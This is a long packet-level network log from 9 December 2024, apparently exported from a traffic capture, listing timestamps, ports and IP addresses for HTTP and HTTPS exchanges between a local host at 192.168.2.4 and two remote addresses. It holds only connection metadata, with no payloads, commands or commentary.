Dec 9, 2024 08:08:37.187321901 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.187383890 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.188218117 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.188261986 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.188318968 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.188368082 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.189186096 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.189234018 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.189291954 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.189389944 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.190232992 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.190275908 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.190308094 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.190354109 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.191246986 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.191294909 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.191320896 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.191359997 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.192219973 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.192265034 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.192316055 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.248763084 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.248811960 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.248842955 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.248879910 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.249291897 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.249366999 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.249392986 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.249413013 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.250029087 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.250147104 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.250169992 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.250188112 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.251019001 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.251128912 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.251167059 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.252017021 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.252063036 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.252136946 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.252198935 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.253047943 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.253091097 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.253125906 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.253175020 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.254039049 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.254082918 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.254256010 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.254327059 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.255057096 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.255094051 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.255120039 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.255135059 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.256074905 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.256129026 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.256174088 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.256201029 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.257047892 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.257148981 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.257210970 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.257271051 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.258081913 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.258167028 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.258193016 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.258244038 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.259074926 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.259123087 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.259179115 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.259222984 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.260075092 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.260123014 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.260178089 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.260230064 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.261070013 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.261120081 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.261156082 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.261199951 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.262074947 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.262115002 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.262190104 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.262231112 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.263092995 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.263139009 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.263206959 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.263257027 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.264116049 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.264167070 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.264199018 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.264240026 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.265101910 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.265152931 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.265187979 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.265242100 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.266109943 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.266154051 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.266218901 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.266254902 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.267115116 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.267158985 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.267209053 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.267272949 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.268121004 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.268166065 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.268215895 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.268268108 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.269155025 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.269196987 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.269229889 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.269278049 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.270109892 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.270178080 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.270235062 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.270292997 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.271115065 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.271155119 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.271217108 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.271267891 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.272128105 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.272166014 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.272227049 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.272274971 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.273122072 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.273174047 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.273205042 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.273240089 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.274168968 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.274235010 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.274269104 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.274312973 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.275319099 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.275362015 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.275418997 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.275465012 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.276259899 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.276304007 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.276328087 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.276371002 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.277192116 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.277235985 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.277311087 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.277353048 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.278176069 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.278220892 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.278294086 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.278332949 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.279186010 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.279227018 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.279283047 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.279321909 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.280206919 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.280250072 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.280311108 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.280354977 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.281177998 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.281232119 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.315881968 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.315901995 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.315931082 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.315959930 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.316390991 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.316454887 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.316495895 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.316540003 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.317426920 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.317471981 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.317472935 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.317509890 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.318516016 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.318527937 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.318557024 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.318577051 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.319422007 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.319464922 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.319520950 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.319567919 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.320415020 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.320461035 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.320497036 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.320539951 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.321183920 CET	443	49847	104.21.16.9	192.168.2.4
Dec 9, 2024 08:08:37.321255922 CET	49847	443	192.168.2.4	104.21.16.9
Dec 9, 2024 08:08:37.321422100 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.321471930 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.321530104 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.321578979 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.322428942 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.322485924 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.322551012 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.322597027 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.322695017 CET	49847	443	192.168.2.4	104.21.16.9
Dec 9, 2024 08:08:37.322705030 CET	443	49847	104.21.16.9	192.168.2.4
Dec 9, 2024 08:08:37.322956085 CET	443	49847	104.21.16.9	192.168.2.4
Dec 9, 2024 08:08:37.323436975 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.323488951 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.323527098 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.323563099 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.324112892 CET	49847	443	192.168.2.4	104.21.16.9
Dec 9, 2024 08:08:37.324431896 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.324476004 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.324527979 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.324574947 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.324867964 CET	49847	443	192.168.2.4	104.21.16.9
Dec 9, 2024 08:08:37.324908972 CET	443	49847	104.21.16.9	192.168.2.4
Dec 9, 2024 08:08:37.325102091 CET	49847	443	192.168.2.4	104.21.16.9
Dec 9, 2024 08:08:37.325139046 CET	443	49847	104.21.16.9	192.168.2.4
Dec 9, 2024 08:08:37.325467110 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.325505018 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.325510025 CET	49847	443	192.168.2.4	104.21.16.9
Dec 9, 2024 08:08:37.325551987 CET	443	49847	104.21.16.9	192.168.2.4
Dec 9, 2024 08:08:37.325567007 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.325645924 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.325664043 CET	49847	443	192.168.2.4	104.21.16.9
Dec 9, 2024 08:08:37.325692892 CET	443	49847	104.21.16.9	192.168.2.4
Dec 9, 2024 08:08:37.325808048 CET	49847	443	192.168.2.4	104.21.16.9
Dec 9, 2024 08:08:37.325845957 CET	443	49847	104.21.16.9	192.168.2.4
Dec 9, 2024 08:08:37.325953007 CET	49847	443	192.168.2.4	104.21.16.9
Dec 9, 2024 08:08:37.325984001 CET	443	49847	104.21.16.9	192.168.2.4
Dec 9, 2024 08:08:37.325992107 CET	49847	443	192.168.2.4	104.21.16.9
Dec 9, 2024 08:08:37.325999975 CET	443	49847	104.21.16.9	192.168.2.4
Dec 9, 2024 08:08:37.326114893 CET	49847	443	192.168.2.4	104.21.16.9
Dec 9, 2024 08:08:37.326138973 CET	443	49847	104.21.16.9	192.168.2.4
Dec 9, 2024 08:08:37.326153994 CET	49847	443	192.168.2.4	104.21.16.9
Dec 9, 2024 08:08:37.326246023 CET	49847	443	192.168.2.4	104.21.16.9
Dec 9, 2024 08:08:37.326275110 CET	49847	443	192.168.2.4	104.21.16.9
Dec 9, 2024 08:08:37.326469898 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.326522112 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.326581955 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.326632977 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.327460051 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.327506065 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.327591896 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.327639103 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.328440905 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.328485012 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.367336035 CET	443	49847	104.21.16.9	192.168.2.4
Dec 9, 2024 08:08:37.367446899 CET	49847	443	192.168.2.4	104.21.16.9
Dec 9, 2024 08:08:37.367470980 CET	443	49847	104.21.16.9	192.168.2.4
Dec 9, 2024 08:08:37.367487907 CET	49847	443	192.168.2.4	104.21.16.9
Dec 9, 2024 08:08:37.367500067 CET	443	49847	104.21.16.9	192.168.2.4
Dec 9, 2024 08:08:37.367511988 CET	49847	443	192.168.2.4	104.21.16.9
Dec 9, 2024 08:08:37.367518902 CET	443	49847	104.21.16.9	192.168.2.4
Dec 9, 2024 08:08:37.367542982 CET	49847	443	192.168.2.4	104.21.16.9
Dec 9, 2024 08:08:37.367558002 CET	443	49847	104.21.16.9	192.168.2.4
Dec 9, 2024 08:08:37.387533903 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.387617111 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.387638092 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.387666941 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.388024092 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.388077974 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.388113976 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.388151884 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.389024019 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.389075041 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.389111042 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.389203072 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.390047073 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.390094995 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.390151024 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.390300035 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.391045094 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.391092062 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.391149998 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.391206026 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.392044067 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.392092943 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.392147064 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.392237902 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.393050909 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.393095970 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.393102884 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.393141985 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.440924883 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.440985918 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.441004038 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.441020966 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.441464901 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.441529036 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.441540003 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.441576958 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.442439079 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.442493916 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.442579985 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.442621946 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.443434000 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.443485022 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.443542004 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.443659067 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.444437027 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.444514990 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.444535971 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.444561005 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.445447922 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.445494890 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.445550919 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.445596933 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.446448088 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.446501017 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.446556091 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.446655035 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.447453976 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.447521925 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.447560072 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.447756052 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.448445082 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.448498964 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.448555946 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.448601007 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.449454069 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.449502945 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.449565887 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.449661970 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.450465918 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.450515985 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.450588942 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.450743914 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.451472044 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.451533079 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.451585054 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.451627016 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.452541113 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.452586889 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.452641010 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.452789068 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.453493118 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.453533888 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.453594923 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.453654051 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.454493046 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.454569101 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.454601049 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.454639912 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.455491066 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.455539942 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.455596924 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.455653906 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.456509113 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.456557035 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.456619024 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.456692934 CET	49827	80	192.168.2.4	185.215.113.206
Dec 9, 2024 08:08:37.457513094 CET	80	49827	185.215.113.206	192.168.2.4
Dec 9, 2024 08:08:37.457561970 CET	49827	80	192.168.2.4	185.215.113.206
